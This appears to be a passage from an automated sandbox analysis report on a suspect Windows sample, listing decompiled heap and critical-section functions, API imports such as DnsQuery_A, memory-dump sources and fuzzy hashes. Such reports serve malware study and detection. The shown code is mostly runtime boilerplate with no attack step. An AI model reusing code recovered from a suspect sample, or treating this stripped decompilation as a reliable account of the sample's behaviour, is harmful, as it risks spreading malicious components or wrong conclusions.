                                                                                                    0x00417f04
                                                                                                    0x00417f0e
                                                                                                    0x00417f11
                                                                                                    0x00417f14
                                                                                                    0x00417f21

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(dnsapi.dll), ref: 00417EB1
                                                                                                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: DnsQuery_A$dnsapi.dll
                                                                                                    • API String ID: 2574300362-3847274415
                                                                                                    • Opcode ID: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
                                                                                                    • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                                                                                                    • Opcode Fuzzy Hash: 1f81088a46c0324dda660dd481f614bad9869b2585b748a82db9a8fe1a613a36
                                                                                                    • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004020EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 55%
                                                                                                    			E004020EC(void* __eax) {
				intOrPtr _v8;
				void* __ebp;
				signed int* _t24;
				signed int* _t25;
				intOrPtr _t26;
				signed int* _t38;
				void* _t42;
				signed int _t43;
				signed int _t44;
				signed int _t51;
				intOrPtr _t52;
				signed int _t56;
				signed int* _t58;
				signed int* _t62;
				intOrPtr _t65;
				intOrPtr _t67;

				_t65 = _t67;
				_t42 = __eax;
				 *0x41c5b0 = 0;
				if( *0x41c5ac != 0 || E00401870() != 0) {
					_push(_t65);
					_push(E0040227E);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t67;
					__eflags =  *0x41c035;
					if( *0x41c035 != 0) {
						_push("(.M");
						L004011CC();
					}
					_t62 = _t42 - 4;
					_t43 =  *_t62;
					__eflags = _t43 & 0x00000002;
					if((_t43 & 0x00000002) != 0) {
						 *0x41c59c =  *0x41c59c - 1;
						 *0x41c5a0 =  *0x41c5a0 - (_t43 & 0x7ffffffc) - 4;
						__eflags = _t43 & 0x00000001;
						if((_t43 & 0x00000001) == 0) {
							L14:
							_t44 = _t43 & 0x7ffffffc;
							_t24 = _t62 + _t44;
							_t58 = _t24;
							__eflags = _t58 -  *0x41c608; // 0x4c184f4
							if(__eflags != 0) {
								_t51 =  *_t24;
								__eflags = _t51 & 0x00000002;
								if((_t51 & 0x00000002) == 0) {
									_t25 = _t58;
									__eflags = _t25[1];
									if(_t25[1] == 0) {
										L25:
										 *0x41c5b0 = 0xb;
									} else {
										__eflags =  *_t25;
										if( *_t25 == 0) {
											goto L25;
										} else {
											__eflags = _t25[2] - 0xc;
											if(_t25[2] >= 0xc) {
												__eflags = _t44;
												E00401A14(_t25);
												goto L27;
											} else {
												goto L25;
											}
										}
									}
								} else {
									__eflags = (_t51 & 0x7ffffffc) - 4;
									if((_t51 & 0x7ffffffc) >= 4) {
										 *_t24 =  *_t24 | 0x00000001;
										L27:
										E00401C7C(_t62, _t44);
									} else {
										 *0x41c5b0 = 0xb;
									}
								}
								goto L28;
							} else {
								 *0x41c608 =  *0x41c608 - _t44;
								 *0x41c604 =  *0x41c604 + _t44;
								__eflags =  *0x41c604 - 0x3c00;
								if( *0x41c604 > 0x3c00) {
									E00401D04(_t24);
								}
								_v8 = 0;
								E0040303C();
								goto L32;
							}
						} else {
							_t56 =  *(_t62 - 0xc + 8);
							__eflags = _t56 - 0xc;
							if(_t56 < 0xc) {
								L10:
								 *0x41c5b0 = 0xa;
								goto L28;
							} else {
								__eflags = _t56 & 0x80000003;
								if((_t56 & 0x80000003) == 0) {
									_t38 = _t62 - _t56;
									__eflags = _t56 - _t38[2];
									if(_t56 == _t38[2]) {
										_t43 = _t43 + _t56;
										__eflags = _t43;
										_t62 = _t38;
										E00401A14(_t38);
										goto L14;
									} else {
										 *0x41c5b0 = 0xa;
										goto L28;
									}
								} else {
									goto L10;
								}
							}
						}
					} else {
						 *0x41c5b0 = 9;
						L28:
						_t26 =  *0x41c5b0; // 0x0
						_v8 = _t26;
						__eflags = 0;
						_pop(_t52);
						 *[fs:eax] = _t52;
						_push(E00402285);
						__eflags =  *0x41c035;
						if( *0x41c035 != 0) {
							_push("(.M");
							L004011D4();
							return 0;
						}
						return 0;
					}
				} else {
					 *0x41c5b0 = 8;
					_v8 = 8;
					L32:
					return _v8;
				}
			}



















                                                                                                    0x004020ed
                                                                                                    0x004020f3
                                                                                                    0x004020f7
                                                                                                    0x00402103
                                                                                                    0x00402126
                                                                                                    0x00402127
                                                                                                    0x0040212c
                                                                                                    0x0040212f
                                                                                                    0x00402132
                                                                                                    0x00402139
                                                                                                    0x0040213b
                                                                                                    0x00402140
                                                                                                    0x00402140
                                                                                                    0x00402147
                                                                                                    0x0040214a
                                                                                                    0x0040214c
                                                                                                    0x0040214f
                                                                                                    0x00402160
                                                                                                    0x00402170
                                                                                                    0x00402176
                                                                                                    0x00402179
                                                                                                    0x004021c0
                                                                                                    0x004021c0
                                                                                                    0x004021c8
                                                                                                    0x004021ca
                                                                                                    0x004021cc
                                                                                                    0x004021d2
                                                                                                    0x00402200
                                                                                                    0x00402202
                                                                                                    0x00402205
                                                                                                    0x00402223
                                                                                                    0x00402225
                                                                                                    0x00402229
                                                                                                    0x00402236
                                                                                                    0x00402236
                                                                                                    0x0040222b
                                                                                                    0x0040222b
                                                                                                    0x0040222e
                                                                                                    0x00000000
                                                                                                    0x00402230
                                                                                                    0x00402230
                                                                                                    0x00402234
                                                                                                    0x00402245
                                                                                                    0x00402247
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402234
                                                                                                    0x0040222e
                                                                                                    0x00402207
                                                                                                    0x0040220d
                                                                                                    0x00402210
                                                                                                    0x0040221e
                                                                                                    0x0040224c
                                                                                                    0x00402250
                                                                                                    0x00402212
                                                                                                    0x00402212
                                                                                                    0x00402212
                                                                                                    0x00402210
                                                                                                    0x00000000
                                                                                                    0x004021d4
                                                                                                    0x004021d4
                                                                                                    0x004021da
                                                                                                    0x004021e0
                                                                                                    0x004021ea
                                                                                                    0x004021ec
                                                                                                    0x004021ec
                                                                                                    0x004021f3
                                                                                                    0x004021f6
                                                                                                    0x00000000
                                                                                                    0x004021f6
                                                                                                    0x0040217b
                                                                                                    0x00402180
                                                                                                    0x00402183
                                                                                                    0x00402186
                                                                                                    0x00402190
                                                                                                    0x00402190
                                                                                                    0x00000000
                                                                                                    0x00402188
                                                                                                    0x00402188
                                                                                                    0x0040218e
                                                                                                    0x004021a1
                                                                                                    0x004021a3
                                                                                                    0x004021a6
                                                                                                    0x004021b7
                                                                                                    0x004021b7
                                                                                                    0x004021b9
                                                                                                    0x004021bb
                                                                                                    0x00000000
                                                                                                    0x004021a8
                                                                                                    0x004021a8
                                                                                                    0x00000000
                                                                                                    0x004021a8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040218e
                                                                                                    0x00402186
                                                                                                    0x00402151
                                                                                                    0x00402151
                                                                                                    0x00402255
                                                                                                    0x00402255
                                                                                                    0x0040225a
                                                                                                    0x0040225d
                                                                                                    0x0040225f
                                                                                                    0x00402262
                                                                                                    0x00402265
                                                                                                    0x0040226a
                                                                                                    0x00402271
                                                                                                    0x00402273
                                                                                                    0x00402278
                                                                                                    0x00000000
                                                                                                    0x00402278
                                                                                                    0x0040227d
                                                                                                    0x0040227d
                                                                                                    0x0040210e
                                                                                                    0x0040210e
                                                                                                    0x00402118
                                                                                                    0x00402285
                                                                                                    0x0040228d
                                                                                                    0x0040228d

                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32((.M,00000000,0040227E,?,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00402140
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,00402285,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00402278
                                                                                                      • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32((.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                      • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32((.M,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                      • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,(.M,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                      • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32((.M,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                    • String ID: (.M
                                                                                                    • API String ID: 2227675388-3396729419
                                                                                                    • Opcode ID: d026377179a31e497360b280726259e7060738e251029b9bdee65d42569822d8
                                                                                                    • Instruction ID: 949cd651b784a6043247fc04aab986b2bc0d8b81d0cf300235882c7ee1a4b758
                                                                                                    • Opcode Fuzzy Hash: d026377179a31e497360b280726259e7060738e251029b9bdee65d42569822d8
                                                                                                    • Instruction Fuzzy Hash: C541D071644250DFE7119BA5EE8D7963AA2A789318F2481BFE400A72F1D3BCA845C74D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401A0F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 64%
                                                                                                    			E00401A0F(void* __eax) {
				void* _t1;

				_t1 = __eax;
				if( *0x41c035 != 0) {
					_push("(.M");
					L004011D4();
				}
				_push("(.M");
				L004011DC();
				return _t1;
			}




                                                                                                    0x00401a0f
                                                                                                    0x004019f3
                                                                                                    0x004019f5
                                                                                                    0x004019fa
                                                                                                    0x004019fa
                                                                                                    0x004019ff
                                                                                                    0x00401a04
                                                                                                    0x00401a09

                                                                                                    APIs
                                                                                                    • RtlLeaveCriticalSection.KERNEL32((.M,00401A11,004D4A48,00000000,00401A0A), ref: 004019FA
                                                                                                    • RtlDeleteCriticalSection.KERNEL32((.M,00401A11,004D4A48,00000000,00401A0A), ref: 00401A04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$DeleteLeave
                                                                                                    • String ID: (.M
                                                                                                    • API String ID: 794802610-3396729419
                                                                                                    • Opcode ID: 5a461f287ecde31b88134a9370ce8b4b3d307b8b32b8f1ba659d575e9c5e9e8e
                                                                                                    • Instruction ID: 81b4cff752923d975dcf0d3a9042c04a3ffadf6b5c06f3fba450d669683ca3a4
                                                                                                    • Opcode Fuzzy Hash: 5a461f287ecde31b88134a9370ce8b4b3d307b8b32b8f1ba659d575e9c5e9e8e
                                                                                                    • Instruction Fuzzy Hash: 95B092F91C4262BCD62962A24CE7BE67C830709708FA4047F2580349F28ABE1080D25E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Executed Functions

                                                                                                    Function 005800B1 Relevance: .5, Instructions: 506COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.675493236.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_580000_Pthmzffh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9422c497d403019c726a6d9dc4b8c4bdad9da722c950b709e23b1082c5d30bc
                                                                                                    • Instruction ID: 9ab7b61d01601e3a0e018fe0474dbb30476b802a91091b20efda8963c327ca36
                                                                                                    • Opcode Fuzzy Hash: a9422c497d403019c726a6d9dc4b8c4bdad9da722c950b709e23b1082c5d30bc
                                                                                                    • Instruction Fuzzy Hash: D0117C30C082499FCB01EFB9D8556EEBFB1EF8A305F14846AD105B72A1DB386A45CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00580448 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.675493236.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_580000_Pthmzffh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ed449187f60eafd38ad40950f171f5f98a2e052d48b34680ba4c07afd6ccc0d3
                                                                                                    • Instruction ID: c813ecf474153af657401dd22d4b35a9667fe99bb40eee96da8f5c94ce098e31
                                                                                                    • Opcode Fuzzy Hash: ed449187f60eafd38ad40950f171f5f98a2e052d48b34680ba4c07afd6ccc0d3
                                                                                                    • Instruction Fuzzy Hash: 33115A30D0020A9FCB44EFB9D8555EEBBB5FF89305F108429D119B3260DB386A85CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005804E0 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.675493236.0000000000580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_580000_Pthmzffh.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1fcbecf31a9c1603635aefbede4fefc38b7fd529692c52fde426ff8001ac585e
                                                                                                    • Instruction ID: 004d6d5b84498a56eb44be221154b78ba2a80f1457d8df9a0e5f651db5711d98
                                                                                                    • Opcode Fuzzy Hash: 1fcbecf31a9c1603635aefbede4fefc38b7fd529692c52fde426ff8001ac585e
                                                                                                    • Instruction Fuzzy Hash: F401D430909208DFC719EBB0D55199DBBB2FF4A304F145CE9E40567391EB359E85CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%